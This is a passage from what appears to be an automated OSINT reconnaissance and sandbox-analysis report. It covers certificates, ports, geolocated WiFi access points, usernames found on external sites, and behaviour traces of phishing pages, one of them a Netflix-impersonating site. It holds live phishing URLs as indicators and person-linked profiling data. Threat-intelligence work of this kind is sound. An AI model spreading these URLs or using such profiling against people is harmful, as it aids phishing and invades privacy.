archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabFF56.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000812]\n "CLXG2BM2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CLXG2BM2.txt]- [targetUID: 00000000-00002536]\n "CabFF56.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\CabFF56.tmp]- [targetUID: 00000000-00000812]\n "BBB0B9C986171FE6F65C60CFDD8B124F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BBB0B9C986171FE6F65C60CFDD8B124F]- [targetUID: 00000000-00000812]\n "~DF71962694B43492EC.TMP" has type "data"- Location: [%TEMP%\\~DF71962694B43492EC.TMP]- [targetUID: 00000000-00002536]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002536]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002536]\n "BE2B512E0EA306BAD5DC86CC33D62C85" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BE2B512E0EA306BAD5DC86CC33D62C85]- [targetUID: 00000000-00000812]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00000812]\n "93BCFOQ7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\93BCFOQ7.txt]- [targetUID: 00000000-00002536]\n "90MZUOV9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\90MZUOV9.txt]- [targetUID: 00000000-00002536]\n "1B1495DD322A24490E2BF2FAABAE1C61" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\1B1495DD322A24490E2BF2FAABAE1C61]- [targetUID: 00000000-00000812]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002536]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002536]\n "9MS61IBX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9MS61IBX.txt]- [targetUID: 00000000-00002536]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000812]\n "103621DE9CD5414CC2538780B4B75751" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\103621DE9CD5414CC2538780B4B75751]- [targetUID: 00000000-00000812]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://regclickonetwoget.com/?qs=SVI3JJKW8KWM1XICHGSM-41fb87317e87a7486e"- [Source: Input]\n Pattern match: "https://regclickonetwoget.com"- [Source: Input]\n Heuristic match: "e1.o.lencr.org"- [Source: PCAP]\n Heuristic match: "GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgQibVTQK8A8W0dT8xq4Fb0ooQ%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: e1.o.lencr.org"- [Source: PCAP]\n Heuristic match: "facesupdates.com"- [Source: PCAP]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /Tracede/animate.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://regclickonetwoget.com/?qs=SVI3JJKW8KWM1XICHGSM-41fb87317e87a7486e\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:1 | 104.196.30.220 |
| 2023-05-12 03:43:29 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | United States | inflany.com |
| 2023-05-12 03:24:29 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | Cloudflare\, Inc. | C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com |
| 2023-05-12 03:22:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.97.1:8443 | 188.114.97.1 |
| 2023-05-12 02:55:11 | Physical Location | No | Censys | 1 | 0 | 2 | 0 | None | Bursa, Bursa Province, 16250, Turkey, Asia | 87.248.157.102 |
| 2023-05-12 02:46:36 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | North Charleston, United States | 34.148.97.127 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | HNG (Net ID: 00:01:E3:0D:91:90) | 52.3759, 4.8975 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | HackerRank (Category: tech)
https://www.hackerrank.com/profile/login | login |
| 2023-05-12 03:41:52 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | Microsoft Windows | 45.131.109.53 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | RIA-FRANKFURT (Net ID: 00:01:E3:5C:A6:A3) | 50.1188, 8.6843 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60483bb94334-EWR"} |
| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5b18b39c858117-ORD
Content-Encoding: gzip
| 104.21.71.14 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.50): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:16:B6:2D:FB:6B) | 32.8608, -79.9746 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00x44.github.io]
https://www.openphish.com/feed.txt | 00x44.github.io |
| 2023-05-12 02:46:54 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cloudflare.com | brett.ns.cloudflare.com |
| 2023-05-12 02:57:24 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | fluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5454e7fad90297-ORD
| 188.114.96.1 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:02:CF:4A:E5:0D) | 40.2024, 29.0398 |
| 2023-05-12 02:44:42 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:88:80:c3:9c:e1:f5:05:d4:ce:eb:a7:b8:8b:96:69:16:e7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 13:22:33 2023 GMT
Not After : Jun 25 13:22:32 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:d7:3e:a0:44:3f:74:66:1e:5f:b3:2a:36:ad:
5d:f6:03:6b:7c:a2:a0:47:3a:fb:01:98:b1:8f:cc:
c2:91:5e:2e:be:9e:37:09:fc:a3:ca:c0:ce:59:08:
31:20:c4:42:4f:e2:31:60:c4:be:0d:a3:d0:7e:5f:
84:84:43:02:3b:79:0a:56:99:86:35:5f:ee:ec:21:
8b:06:16:ef:3b:0d:ec:b0:a6:01:ca:7c:9f:ae:0e:
21:80:e7:f6:f2:e9:02:7d:5d:df:7d:70:dd:dd:93:
90:c2:a3:7e:80:f6:ad:ed:f9:15:f2:c4:37:d6:ad:
4b:89:76:da:d5:eb:7c:ff:f8:44:95:84:d6:c3:19:
7b:70:37:49:42:e5:fe:7d:2c:bd:de:bc:2b:99:c0:
a4:9b:15:4f:d7:2f:f2:c7:b5:99:6b:e4:41:8f:a5:
3f:0f:85:1f:6c:4e:91:90:da:48:18:85:c0:a8:f9:
5b:43:e7:ba:4b:5b:17:69:9f:6a:26:1d:48:87:97:
a5:b7:a2:63:4f:58:3b:87:61:7a:53:e1:17:71:98:
3f:e6:14:b4:56:34:1d:a0:89:72:33:eb:2c:c5:36:
a0:27:b1:d2:f8:c6:e3:8f:79:67:b5:d6:8a:ec:f1:
bd:9b:ad:69:c1:3b:50:1a:84:e7:cb:cf:d0:71:43:
d2:3b:49:a5:27:2e:d1:3d:b9:18:82:02:4d:8f:b0:
bb:df:42:cf:64:aa:67:dc:2f:01:5a:31:2e:da:fb:
b2:d7:58:03:8e:aa:3f:4c:ca:46:eb:1f:d0:ce:c6:
8c:fe:3d:b8:0f:99:bb:cf:51:78:2e:f4:7a:df:b5:
ee:fc:f9:a7:d1:b7:2b:1b:c6:17:72:43:c6:34:57:
a1:d1:1d:f1:0c:8c:8a:f9:1d:27:7f:56:dc:e1:0f:
9b:fe:d2:eb:01:b7:80:25:0c:68:e6:38:d2:70:20:
00:db:75:51:f4:50:11:95:65:85:63:dc:a6:18:f5:
d8:1d:55:65:7b:fd:4b:42:c9:e0:e0:5b:99:47:62:
96:1e:29:13:2d:13:79:08:f1:19:4e:83:44:d1:b3:
1e:52:55:c8:85:91:ec:6f:74:02:73:b9:35:b5:4d:
32:70:2b:a5:40:65:f3:30:c9:2a:75:4a:fc:26:5e:
25:6b:0f:f0:6e:21:a9:a3:b3:fc:a9:24:00:c1:d2:
4b:2c:3d:0a:55:12:77:ec:d9:f9:b2:f1:bc:2c:ec:
53:cb:52:84:47:80:24:42:33:90:05:e1:7c:3a:b2:
37:ee:d5:9d:71:10:25:16:47:45:30:42:37:7d:df:
2f:44:a5:75:17:fd:0c:59:0a:14:5f:4a:c6:9e:57:
1c:e4:cb
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
EE:9A:7C:45:9F:8D:28:F8:82:DE:AE:58:A9:48:6F:F4:DA:ED:01:D8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a3:1a:73:71:ae:ed:9f:b5:9b:61:66:0e:f9:3c:05:e5:98:b9:
71:fe:3a:01:23:3c:a5:ed:da:b4:47:c0:62:3d:82:74:46:2d:
f3:bc:7d:58:f7:9d:a3:63:b0:c8:15:ad:b0:58:bc:d6:75:4d:
8b:28:94:cb:bc:69:7c:80:f8:cd:78:76:8f:73:94:76:90:7d:
80:5c:21:83:4e:e4:26:a7:06:a5:e9:38:47:ff:a7:5f:42:bd:
c4:d9:74:6a:33:69:46:51:e5:bd:52:74:21:07:0b:2d:14:31:
45:31:91:5d:2e:25:25:a0:10:c9:3a:3e:d7:38:78:9b:b2:aa:
22:af:71:e4:8a:d0:ec:e4:7c:b6:88:11:5f:5d:42:ee:2b:78:
b2:c8:8f:62:9a:3e:c3:a6:06:7e:f7:0b:b9:99:fa:b8:e0:42:
79:cd:64:e7:19:13:71:ab:ad:f1:90:66:20:91:56:0f:0c:e3:
48:ed:63:55:89:67:59:f7:08:9e:72:d6:2b:54:e9:5e:60:6b:
af:15:40:e4:e3:93:64:05:b5:87:bf:b5:3b:e3:0a:3e:94:9e:
a2:8e:f7:62:b7:7a:47:d1:97:14:d5:e3:c4:7b:f6:89:76:12:
8c:29:e2:6a:8d:3f:22:f5:b7:f7:82:ac:c9:19:ac:5c:cb:6e:
d1:2d:07:ab
|
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.117 | 35.229.48.116 |
| 2023-05-12 03:08:51 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.124 | 34.148.97.127 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Nesrin (Net ID: 00:02:61:71:AB:40) | 40.2024, 29.0398 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ELSA1 (Net ID: 00:02:2D:29:60:79) | 50.1188, 8.6843 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | United States | telleria.com |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.239): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:10 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | kwejk.pl (Category: images)
https://kwejk.pl/uzytkownik/login#/tablica/ | login |
| 2023-05-12 02:55:15 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | linux | 165.232.113.85 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:20 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-1f4d\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:20 GMT", "cf-ray": "7c5f605fb97f4259-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 03:09:34 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | 01def.io | 01def.io |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Chess.com (Category: gaming)
https://www.chess.com/member/Altpapier | Altpapier |
| 2023-05-12 03:21:08 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | wattpad (Category: social)
https://www.wattpad.com/user/dawidsulej | dawidsulej |
| 2023-05-12 02:57:09 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:d8:ac:1a:31:df:8f:f8:c7:c3:27:35:9c:31:39:5f:60:e8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:22 2022 GMT
Not After : Feb 15 17:26:21 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b8:46:5d:ac:6d:f3:78:e1:a9:4f:74:a7:83:2a:
f1:af:bd:cc:66:b6:b9:bf:84:6f:47:9b:97:1c:a8:
c9:7d:6c:fe:9e:8e:79:9c:a5:37:f9:7d:7a:a0:3b:
dd:dd:59:27:44:ef:fa:f9:9f:ac:5e:a7:96:85:d6:
12:a4:67:16:8a:d5:1c:b5:d1:2d:4e:c7:ec:3d:19:
e5:de:7b:f7:77:77:6b:39:f5:6c:f2:bc:49:15:e4:
d9:26:16:d0:09:ff:d0:9f:cc:e1:2f:72:cd:5d:49:
42:8f:44:ab:2b:64:2c:16:15:0b:c6:a8:c4:87:48:
5c:ca:2c:13:33:5b:9e:8f:26:9e:57:1a:3f:da:51:
8d:e5:86:b3:d8:b8:bb:9b:a8:35:c1:05:df:6d:60:
e8:57:86:af:77:94:58:18:ee:4d:cc:61:8e:ef:d8:
ae:1a:ad:73:4e:d6:21:83:54:e8:94:6d:be:b2:5a:
91:8d:86:36:60:55:a8:6c:ac:42:09:7d:39:a2:a8:
c7:4d:09:67:42:98:43:91:4c:6e:9c:44:89:71:c9:
81:24:98:ab:01:48:f5:7f:9f:03:76:19:5e:40:1f:
e2:a9:ac:0e:74:15:d2:c7:02:a6:94:0f:07:1e:c2:
8f:1c:65:ac:eb:0a:21:1c:42:25:eb:b3:3c:e5:3d:
0f:68:8a:07:35:fd:f2:bf:65:bb:27:0a:28:75:d7:
36:a5:f8:ad:87:2d:4d:e9:8c:44:1c:dd:e0:1f:f8:
19:b0:d2:ba:53:d4:71:e9:68:d3:d7:47:bd:bd:b3:
12:21:a8:7f:36:dd:3a:ee:09:ec:a7:f6:99:fc:9a:
ee:64:c3:e9:cb:48:8b:5b:53:b6:9a:34:49:ed:6f:
97:8c:71:a4:8f:ff:5a:94:b4:2f:23:08:04:1f:5f:
dd:ba:07:c4:98:26:ce:e7:92:3f:eb:aa:ca:85:d1:
9e:9d:66:9d:15:94:f9:a8:c4:87:5f:d8:0f:2a:bd:
f6:c1:3a:15:a4:4a:73:81:4d:25:59:6c:74:3c:88:
be:35:3a:e2:55:b7:aa:f2:6a:84:aa:03:d7:47:36:
8c:65:79:0d:82:62:5e:32:88:98:91:5f:e7:41:ad:
df:3b:04:9a:a4:b7:e8:4a:dc:51:e1:1a:2e:5f:80:
9f:10:99:df:13:16:07:60:53:0f:70:88:4d:8b:bf:
c2:83:ad:7d:95:a6:63:06:b5:f7:e1:fa:b4:f1:f2:
59:97:a4:23:6e:6f:a1:9d:e7:91:3c:8f:96:90:d0:
88:f8:42:7e:b9:a8:0b:95:b2:4a:f1:e1:43:89:bc:
d0:c5:6e:8d:7a:6f:1a:ac:22:35:41:3f:62:4c:b0:
b4:f9:c1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D4:B4:B6:D6:64:7B:5F:1F:0F:AA:DA:BE:7B:F2:3E:AB:24:EE:4D:D7
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
12:c3:23:0c:67:c6:85:51:aa:d3:80:18:b2:65:bd:31:94:8a:
e8:5c:6a:01:d8:5d:c1:9e:5e:a1:8a:00:bf:31:a6:2d:2b:2a:
d3:2e:c1:cb:48:32:97:61:63:f9:88:e4:9c:86:57:55:70:0b:
32:91:1a:0d:37:95:fb:a7:7b:4a:02:c1:4f:b7:cf:20:cf:d1:
69:54:62:41:0e:be:38:0e:7b:77:6c:7e:42:cd:d3:80:5f:ab:
19:e5:8c:24:db:b5:99:d7:5b:1e:e0:f9:51:35:ee:2e:e0:f2:
3b:0e:28:4f:52:fb:a4:cb:e5:d4:44:71:e2:b7:97:1e:35:f2:
db:f3:26:a9:1f:bb:8d:8d:14:2e:84:1c:98:58:cd:d8:11:56:
db:34:47:2c:b7:4d:26:01:fe:51:2b:7a:54:d2:4b:ab:c8:ee:
ec:9f:45:39:6f:fe:90:a4:3d:93:8b:30:b0:a3:b3:2d:bc:f4:
ee:4f:24:be:81:68:9c:c9:32:9e:f9:8d:83:ca:11:33:39:6f:
6f:95:05:65:ef:78:3c:14:e2:53:b2:de:b5:09:28:66:eb:7a:
0b:3e:3f:89:c9:6f:58:91:18:c2:4c:16:9c:f4:c2:32:78:48:
59:ef:54:a6:fe:8f:f7:3b:d0:54:03:d1:5b:32:86:ec:46:0e:
b4:71:65:41
| battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-A822 (Net ID: 00:1D:D4:64:A8:20) | 32.8608, -79.9746 |
| 2023-05-12 02:46:04 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 32.8608, -79.9746 | 34.74.170.74 |
| 2023-05-12 02:59:58 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | name@example.com | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 17, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://hassan-gamall.github.io/netflix/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:6760:304:WilStaging_02"\n "SM0:6760:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:6760:304:WilStaging_02"\n "Local\\SM0:6760:120:WilError_01"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "urlref_httpshassan-gamall.github.ionetflix")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\throttle_store.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\local state"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\site characteristics database\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\edgecoupons\\coupons_data.db\\log"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006768]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00006768]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00006768]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006768]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00006768]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00006768]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00006768]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 